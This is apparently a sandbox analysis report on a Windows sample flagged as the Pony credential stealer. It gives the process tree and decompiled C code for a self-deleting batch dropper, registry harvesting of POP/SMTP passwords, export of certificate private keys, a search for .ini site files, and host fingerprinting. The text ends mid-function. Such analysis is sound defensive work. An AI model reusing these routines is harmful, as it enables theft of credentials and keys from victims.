                                                                  Commandline:'C:\Users\user\Desktop\eQDy6dGVwQ.exe'
                                                                  Imagebase:0x400000
                                                                  File size:92672 bytes
                                                                  MD5 hash:EB2FBC15DFB24AF75C431B7525FED6E7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp, Author: Joe Security
                                                                  • Rule: pony, Description: Identify Pony, Source: 00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                  • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.649049920.0000000000413000.00000002.00020000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:16:34:02
                                                                  Start date:25/03/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
                                                                  Imagebase:0x11d0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:16:34:02
                                                                  Start date:25/03/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff724c50000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                    Executed Functions

                                                                    C-Code - Quality: 64%
                                                                    			E00410065(void* __eax, void* __ebx, void* __eflags) {
                                                                    				CHAR* _v32;
                                                                    				char* _v36;
                                                                    				void* _v40;
                                                                    				int _v44;
                                                                    				CHAR* _v48;
                                                                    				int _t35;
                                                                    				char* _t36;
                                                                    				void* _t39;
                                                                    				void* _t41;
                                                                    				void* _t42;
                                                                    				void* _t44;
                                                                    				struct HINSTANCE__* _t48;
                                                                    				void* _t53;
                                                                    				void* _t57;
                                                                    
                                                                    				_push(0x410079);
                                                                    				asm("clc");
                                                                    				if(__eflags < 0) {
                                                                    					 *((intOrPtr*)(__ebx - 0x6f36742e)) =  *((intOrPtr*)(__ebx - 0x6f36742e)) - 1;
                                                                    					_v48 = E004018CF(0x105);
                                                                    					wsprintfA(_v48, "%d.bat", GetTickCount());
                                                                    					_v32 = E004018CF(0x105);
                                                                    					_t35 = E004018CF(0x105);
                                                                    					_v44 = _t35;
                                                                    					_t36 = E004018CF(0x105);
                                                                    					_v36 = _t36;
                                                                    					GetModuleFileNameA( *0x4173ca, _v32, 0x104);
                                                                    					_t39 = GetTempPathA(0x104, _v44);
                                                                    					__eflags = _t39;
                                                                    					if(_t39 != 0) {
                                                                    						_push(_v48);
                                                                    						_push(_v44);
                                                                    						L00410694();
                                                                    					}
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(2);
                                                                    					_push(0);
                                                                    					_push(3);
                                                                    					_push(0xc0000000);
                                                                    					ExitProcess(_v44); // executed
                                                                    					_v40 = _t39;
                                                                    					_t41 = _t39 + 0x00000001 | _t39 + 0x00000001;
                                                                    					__eflags = _t41;
                                                                    					if(_t41 != 0) {
                                                                    						L8:
                                                                    						_push("\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ");
                                                                    						L0041066A();
                                                                    						_t42 = E00401422(_v40, "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ", _t41); // executed
                                                                    						CloseHandle(_v40);
                                                                    						_t44 = _t42;
                                                                    						__eflags = _t44;
                                                                    						if(_t44 != 0) {
                                                                    							wsprintfA(_v36, "      \"%s\"   ", _v32);
                                                                    							_t48 = LoadLibraryA("shell32.dll");
                                                                    							__eflags = _t48;
                                                                    							if(_t48 != 0) {
                                                                    								_t53 = GetProcAddress(_t48, "ShellExecuteA");
                                                                    								__eflags = _t53;
                                                                    								if(_t53 != 0) {
                                                                    									ShellExecuteA(0, "open", _v44, _v36, 0, 0); // executed
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_push(_v32);
                                                                    						_push(_v44);
                                                                    						L0041068E();
                                                                    						_t57 = StrRChrIA(_v44, 0, 0x5c);
                                                                    						__eflags = _t57;
                                                                    						if(_t57 != 0) {
                                                                    							_t57 = _t57 + 1;
                                                                    							__eflags = _t57;
                                                                    							_push(_v48);
                                                                    							_push(_t57);
                                                                    							L0041068E();
                                                                    						}
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(2);
                                                                    						_push(0);
                                                                    						_push(3);
                                                                    						_push(0xc0000000);
                                                                    						ExitProcess(_v44);
                                                                    						_v40 = _t57;
                                                                    						_t41 = _t57 + 1;
                                                                    						__eflags = _t41;
                                                                    						if(_t41 != 0) {
                                                                    							goto L8;
                                                                    						}
                                                                    					}
                                                                    					E004018B8(_v48);
                                                                    					E004018B8(_v32);
                                                                    					E004018B8(_v44);
                                                                    					return E004018B8(_v36);
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00410092
                                                                    • wsprintfA.USER32 ref: 004100A0
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
                                                                    • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
                                                                    • lstrcat.KERNEL32(?,?), ref: 0041012A
                                                                    • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0041015A
                                                                    • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
                                                                    • lstrcpy.KERNEL32(00000001,?), ref: 00410174
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                                                                    • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                                                    • API String ID: 629621046-4169620016
                                                                    • Opcode ID: 68361a92b31e2b9e819e4902597b623312bae0e346fa83142876c966885b8850
                                                                    • Instruction ID: d87f7c95a24b28c2337a621791b8d5a4a1afbdb6f7934d1f864dba4089bdb773
                                                                    • Opcode Fuzzy Hash: 68361a92b31e2b9e819e4902597b623312bae0e346fa83142876c966885b8850
                                                                    • Instruction Fuzzy Hash: C5413030B542057ADF1576A18C03FEE7AA7AB85704F24843A7614F62E1EEF94DD05A1C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040EBA3(void* _a4, char* _a8, intOrPtr _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				char* _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				char _v2088;
                                                                    				intOrPtr _v2092;
                                                                    				intOrPtr _v2096;
                                                                    				char _v2100;
                                                                    				intOrPtr _v2104;
                                                                    				intOrPtr _v2108;
                                                                    				char _v2112;
                                                                    				intOrPtr _v2116;
                                                                    				intOrPtr _v2120;
                                                                    				char _v2124;
                                                                    				long _t93;
                                                                    				long _t94;
                                                                    				long _t97;
                                                                    
                                                                    				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                    				_t94 = _t93;
                                                                    				if(_t94 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t97 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t98 = _t97;
                                                                    						if(_t97 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401E4C( &_v2064, E00401DF8(_t98, _a8, "\\"),  &_v2064);
                                                                    						_v2072 = E00401D71(_a4, _v2068, "EmailAddress", 0);
                                                                    						_v2076 = E00401D71(_a4, _v2068, "Technology", 0);
                                                                    						_v2080 = E00401D71(_a4, _v2068, "PopServer", 0);
                                                                    						_v2084 = E00401D71(_a4, _v2068, "PopPort",  &_v2088);
                                                                    						_v2092 = E00401D71(_a4, _v2068, "PopAccount", 0);
                                                                    						_v2096 = E00401D71(_a4, _v2068, "PopPassword",  &_v2100);
                                                                    						_v2104 = E00401D71(_a4, _v2068, "SmtpServer", 0);
                                                                    						_v2108 = E00401D71(_a4, _v2068, "SmtpPort",  &_v2112);
                                                                    						_v2116 = E00401D71(_a4, _v2068, "SmtpAccount", 0);
                                                                    						_v2120 = E00401D71(_a4, _v2068, "SmtpPassword",  &_v2124);
                                                                    						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v2072), _a12, _v2076), _a12, _v2080);
                                                                    							E004015CB(E0040159F(_a12, _v2084, _v2088), _a12, _v2092);
                                                                    							E004015CB(E0040159F(_a12, _v2096, _v2100), _a12, _v2104);
                                                                    							E004015CB(E0040159F(_a12, _v2108, _v2112), _a12, _v2116);
                                                                    							E0040159F(_a12, _v2120, _v2124);
                                                                    						}
                                                                    						E0040EBA3(_a4, _v2068, _a12);
                                                                    						E004018B8(_v2068);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2084);
                                                                    						E004018B8(_v2092);
                                                                    						E004018B8(_v2096);
                                                                    						E004018B8(_v2104);
                                                                    						E004018B8(_v2108);
                                                                    						E004018B8(_v2116);
                                                                    						E004018B8(_v2120);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t94;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040EBEA
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                    • API String ID: 1332880857-2111798378
                                                                    • Opcode ID: 6f9c3b9adf4acc33ae500b23a0682b87018db5573f7081e0b67ab4accee4c872
                                                                    • Instruction ID: e2a117a2fde9dc82a56ede7dd39e4504eb823868495590e5bf7fc199db2764f0
                                                                    • Opcode Fuzzy Hash: 6f9c3b9adf4acc33ae500b23a0682b87018db5573f7081e0b67ab4accee4c872
                                                                    • Instruction Fuzzy Hash: E871A23194011CAADF226F51CC02FEDBAB6FF04704F1485BAB558740B1DB7A5BA1AF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E0040D3BE(void* __ebx, char __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v16;
                                                                    				intOrPtr _v20;
                                                                    				long* _v24;
                                                                    				char _v28;
                                                                    				long* _v32;
                                                                    				char _v36;
                                                                    				intOrPtr _v40;
                                                                    				void* __edi;
                                                                    				intOrPtr _t48;
                                                                    				intOrPtr _t49;
                                                                    				intOrPtr _t51;
                                                                    				intOrPtr _t55;
                                                                    				intOrPtr _t58;
                                                                    				intOrPtr _t62;
                                                                    				intOrPtr _t67;
                                                                    				void* _t74;
                                                                    				intOrPtr _t76;
                                                                    				intOrPtr* _t77;
                                                                    				intOrPtr _t79;
                                                                    
                                                                    				_t75 = __ecx;
                                                                    				_t74 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x48, 0);
                                                                    				if( *0x414b47 != 0 &&  *0x414b4b != 0 &&  *0x414b53 != 0 &&  *0x414b13 != 0 &&  *0x414b17 != 0 &&  *0x414b1b != 0 &&  *0x414b1f != 0 &&  *0x414b4f != 0) {
                                                                    					_t48 =  *0x414b47(0, 0x416871); // executed
                                                                    					_v12 = _t48;
                                                                    					if(_v12 != 0) {
                                                                    						_t79 = 0;
                                                                    						while(1) {
                                                                    							_t49 =  *0x414b4b(_v12, _t79);
                                                                    							_t79 = _t49;
                                                                    							_t91 = _t79;
                                                                    							if(_t79 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t76 =  *((intOrPtr*)(_t79 + 0xc));
                                                                    							_t75 =  *((intOrPtr*)(_t76 + 0x68));
                                                                    							_v16 =  *((intOrPtr*)(_t76 + 0x68));
                                                                    							_t77 =  *((intOrPtr*)(_t76 + 0x6c));
                                                                    							__eflags = _t77;
                                                                    							if(__eflags != 0) {
                                                                    								while(1) {
                                                                    									__eflags = _v16;
                                                                    									if(__eflags == 0) {
                                                                    										goto L28;
                                                                    									}
                                                                    									_push("2.5.29.37");
                                                                    									_push( *_t77);
                                                                    									L004106EE();
                                                                    									_t49 = _t49;
                                                                    									__eflags = _t49;
                                                                    									if(_t49 == 0) {
                                                                    										__eflags =  *((intOrPtr*)(_t77 + 8));
                                                                    										if( *((intOrPtr*)(_t77 + 8)) != 0) {
                                                                    											_v20 = E004018CF( *((intOrPtr*)(_t77 + 8)));
                                                                    											_t51 = E00401906( *((intOrPtr*)(_t77 + 0xc)), _v20,  *((intOrPtr*)(_t77 + 8)));
                                                                    											_push(0x41687e);
                                                                    											_push(_v20);
                                                                    											L004106EE();
                                                                    											__eflags = _t51;
                                                                    											if(_t51 == 0) {
                                                                    												_t55 =  *0x414b53(_t79, 0, 0,  &_v24,  &_v28, 0);
                                                                    												__eflags = _t55;
                                                                    												if(_t55 != 0) {
                                                                    													_t58 =  *0x414b13(_v24, _v28,  &_v32);
                                                                    													__eflags = _t58;
                                                                    													if(_t58 != 0) {
                                                                    														_t62 =  *0x414b17(_v32, 0, 7, 0, 0,  &_v36);
                                                                    														__eflags = _t62;
                                                                    														if(_t62 != 0) {
                                                                    															_v40 = E004018CF(_v36);
                                                                    															_t67 =  *0x414b17(_v32, 0, 7, 0, _v40,  &_v36);
                                                                    															__eflags = _t67;
                                                                    															if(_t67 != 0) {
                                                                    																E00401569(_a4, 0xbeef0000);
                                                                    																E0040159F(_a4,  *((intOrPtr*)(_t79 + 4)),  *((intOrPtr*)(_t79 + 8)));
                                                                    																E0040159F(_a4, _v40, _v36);
                                                                    															}
                                                                    															E004018B8(_v40);
                                                                    														}
                                                                    														CryptDestroyKey(_v32);
                                                                    													}
                                                                    													CryptReleaseContext(_v24, 0);
                                                                    												}
                                                                    											}
                                                                    											_t49 = E004018B8(_v20);
                                                                    										}
                                                                    									}
                                                                    									_t77 = _t77 + 0x10;
                                                                    									_t40 =  &_v16;
                                                                    									 *_t40 = _v16 - 1;
                                                                    									__eflags =  *_t40;
                                                                    								}
                                                                    							}
                                                                    							L28:
                                                                    						}
                                                                    						 *0x414b4f(_v12, 0);
                                                                    					}
                                                                    				}
                                                                    				return E00401636(_t74, _t75, _t77, _t91, _a4, _v8);
                                                                    			}

                                                                    APIs
                                                                    • CertOpenSystemStoreA.CRYPT32(00000000,00416871), ref: 0040D444
                                                                    • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
                                                                    • lstrcmp.KERNEL32 ref: 0040D48E
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • lstrcmp.KERNEL32 ref: 0040D4C6
                                                                    • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
                                                                    • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
                                                                    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
                                                                    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
                                                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040D576
                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                                                    • String ID: 2.5.29.37
                                                                    • API String ID: 2649496969-3842544949
                                                                    • Opcode ID: 3efb584be195bc962edaf2b40421064beb62f15f05e1954507cd169d8d8bc6fd
                                                                    • Instruction ID: 69ea86f0ab44da64ba056d6111593992adadb32ff072f1572f9399bad78f7f88
                                                                    • Opcode Fuzzy Hash: 3efb584be195bc962edaf2b40421064beb62f15f05e1954507cd169d8d8bc6fd
                                                                    • Instruction Fuzzy Hash: 9A512931900205FBDF21AB94DC09BEEBB71BF44745F148436BA01761F0D779AA94DB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E00404E73(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                    				struct _WIN32_FIND_DATAA _v322;
                                                                    				void* _v328;
                                                                    				CHAR* _v332;
                                                                    				char* _v336;
                                                                    				char* _t34;
                                                                    				void* _t36;
                                                                    				CHAR* _t38;
                                                                    				void* _t42;
                                                                    				char* _t45;
                                                                    				signed int* _t49;
                                                                    				char** _t51;
                                                                    				char* _t59;
                                                                    				char* _t60;
                                                                    				void* _t64;
                                                                    				signed int* _t65;
                                                                    				void* _t66;
                                                                    
                                                                    				_t64 = __ecx;
                                                                    				_v332 = 0;
                                                                    				_t34 = _a8;
                                                                    				if(_t34 == 0 ||  *_t34 == 0) {
                                                                    					L22:
                                                                    					return E004018B8(_v332);
                                                                    				} else {
                                                                    					_t36 = E004025A9(_a8);
                                                                    					_t37 = _t36;
                                                                    					if(_t36 != 0) {
                                                                    						_t38 = E00401DF8(_t37, _a8, "*.*");
                                                                    					} else {
                                                                    						_t38 = E00401DF8(_t37, _a8, "\*.*");
                                                                    					}
                                                                    					_v332 = _t38;
                                                                    					E004018E6( &_v322, 0x13e);
                                                                    					_t42 = FindFirstFileA(_v332,  &_v322); // executed
                                                                    					_v328 = _t42;
                                                                    					if(_t42 + 1 != 0) {
                                                                    						do {
                                                                    							_t65 =  &_v322;
                                                                    							if(( *_t65 & 0x00000010) == 0) {
                                                                    								_v336 =  &(_t65[0xb]);
                                                                    								_t45 = StrStrIA(_v336, ".ini");
                                                                    								_t46 = _t45;
                                                                    								if(_t45 != 0) {
                                                                    									_t59 = E00401E4C(E00401DF8(_t46, _a8, "\\"), _t58, _v336);
                                                                    									_push(_t59);
                                                                    									_push(_t59);
                                                                    									if(_a12 == 0) {
                                                                    										_t60 = 1;
                                                                    									} else {
                                                                    										_t60 = StrStrIA(_t59, "Sites\\");
                                                                    									}
                                                                    									_pop(_t66);
                                                                    									if(_t60 != 0) {
                                                                    										E00404E5C(_a4, _t66);
                                                                    									}
                                                                    									E004018B8();
                                                                    								}
                                                                    							} else {
                                                                    								_t49 =  &(_t65[0xb]);
                                                                    								_push(_t49);
                                                                    								_push(0x414f84);
                                                                    								L00410712();
                                                                    								if(_t49 != 0) {
                                                                    									_t51 =  &( &_v322->cFileName);
                                                                    									_push(_t51);
                                                                    									_push(0x414f86);
                                                                    									L00410712();
                                                                    									_t52 = _t51;
                                                                    									if(_t51 != 0) {
                                                                    										E00404E73(_t64, _a4, E00401E4C(E00401DF8(_t52, _a8, "\\"), _t53,  &( &_v322->cFileName)), _a12);
                                                                    										E004018B8(_t54);
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						} while (FindNextFileA(_v328,  &_v322) != 0);
                                                                    						FindClose(_v328);
                                                                    					}
                                                                    					goto L22;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00404EE3
                                                                    • lstrcmpi.KERNEL32(00414F84,?), ref: 00404F0C
                                                                    • lstrcmpi.KERNEL32(00414F86,?), ref: 00404F29
                                                                    • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404FD8
                                                                    • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404FEB
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                    • String ID: *.*$.ini$Sites\$\*.*
                                                                    • API String ID: 3040542784-999409347
                                                                    • Opcode ID: c755dd4696622531b8e01361c334175e5357ee14416736f3a60b3252f0e749c2
                                                                    • Instruction ID: 4ebe6fddfcda91dad50fc3424f79042eee35b7dd55d742c6c8e7d1074e8a7db5
                                                                    • Opcode Fuzzy Hash: c755dd4696622531b8e01361c334175e5357ee14416736f3a60b3252f0e749c2
                                                                    • Instruction Fuzzy Hash: 763166B090020AAADF11BF61CC42FEE77A9AF80304F1045B7B518B51E1D77C9EC19E59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E004045FD(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				struct _OSVERSIONINFOA _v164;
                                                                    				char* _v168;
                                                                    				char _v172;
                                                                    				intOrPtr _v176;
                                                                    				struct _SYSTEM_INFO _v212;
                                                                    				struct HINSTANCE__* _v216;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				int _t51;
                                                                    				intOrPtr _t65;
                                                                    				intOrPtr* _t75;
                                                                    				void* _t82;
                                                                    				char _t85;
                                                                    				char _t86;
                                                                    				char* _t88;
                                                                    
                                                                    				_v8 = E004015F0(_a4, 0, 0);
                                                                    				E00401569(_a4, 0xbeef0001);
                                                                    				E004018E6( &_v164, 0x9c);
                                                                    				_v164.dwOSVersionInfoSize = 0x9c;
                                                                    				_t51 = GetVersionExA( &_v164);
                                                                    				_t85 = 0;
                                                                    				_t86 = 0;
                                                                    				_t88 =  &(_v164.szCSDVersion);
                                                                    				while(_t85 < 0x80) {
                                                                    					__eflags =  *_t88;
                                                                    					if( *_t88 == 0) {
                                                                    						_t86 = 1;
                                                                    					}
                                                                    					_t86 = _t86;
                                                                    					__eflags = _t86;
                                                                    					if(_t86 != 0) {
                                                                    						 *_t88 = 0;
                                                                    					}
                                                                    					_t88 = _t88 + 1;
                                                                    					_t85 = _t85 + 1;
                                                                    					__eflags = _t85;
                                                                    				}
                                                                    				if(_t51 == 0) {
                                                                    					E0040159F(_a4, 0, 0);
                                                                    				} else {
                                                                    					E0040159F(_a4,  &_v164, 0x9c);
                                                                    				}
                                                                    				E00401569(_a4, E0040446A());
                                                                    				_v168 = E004018CF(0x400);
                                                                    				E0040159F(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
                                                                    				E0040159F(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff));
                                                                    				E00401569(_a4, E004044D2()); // executed
                                                                    				E0040456C(_t85, _t86, _t88); // executed
                                                                    				_t65 = E004027F7(_t85, _t86, _t88, "HWID",  &_v172); // executed
                                                                    				_v176 = _t65;
                                                                    				if(_v176 == 0 || _v172 < 0x14) {
                                                                    					E0040159F(_a4, 0, 0);
                                                                    				} else {
                                                                    					_v172 = _v172 + 4;
                                                                    					E00401569(_a4, _v172);
                                                                    					_v172 = _v172 - 4;
                                                                    					E00401569(_a4, 0xffffffff);
                                                                    					E0040157E(_a4, _v176, _v172);
                                                                    				}
                                                                    				E004018B8(_v176);
                                                                    				E004018B8(_v168);
                                                                    				_t82 = 0;
                                                                    				_v216 = GetModuleHandleA("kernel32.dll");
                                                                    				if(_v216 != 0) {
                                                                    					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
                                                                    					if(_t75 != 0) {
                                                                    						 *_t75( &_v212); // executed
                                                                    						_t82 = 1;
                                                                    					}
                                                                    				}
                                                                    				_t83 = _t82;
                                                                    				_t97 = _t82;
                                                                    				if(_t82 == 0) {
                                                                    					GetSystemInfo( &_v212);
                                                                    				}
                                                                    				E0040159F(_a4,  &_v212, 0x24);
                                                                    				return E00401636(_t83, _t85, _t88, _t97, _a4, _v8);
                                                                    			}

                                                                    APIs
                                                                    • GetVersionExA.KERNEL32(0000009C), ref: 00404646
                                                                    • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046CB
                                                                    • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046F4
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047A9
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
                                                                    • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047D8
                                                                    • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                                    • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                                    • API String ID: 1787888500-92997708
                                                                    • Opcode ID: e9768509069aead0b0cb670f5b22b7b50caa52f107e222a803b94d01e9eff756
                                                                    • Instruction ID: db48739d82feba77cf0cee32c0e06214f71ac3aef5999eac4331223504f8986d
                                                                    • Opcode Fuzzy Hash: e9768509069aead0b0cb670f5b22b7b50caa52f107e222a803b94d01e9eff756
                                                                    • Instruction Fuzzy Hash: 55518471A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED59F5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E00408AE5(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, char* _a8) {
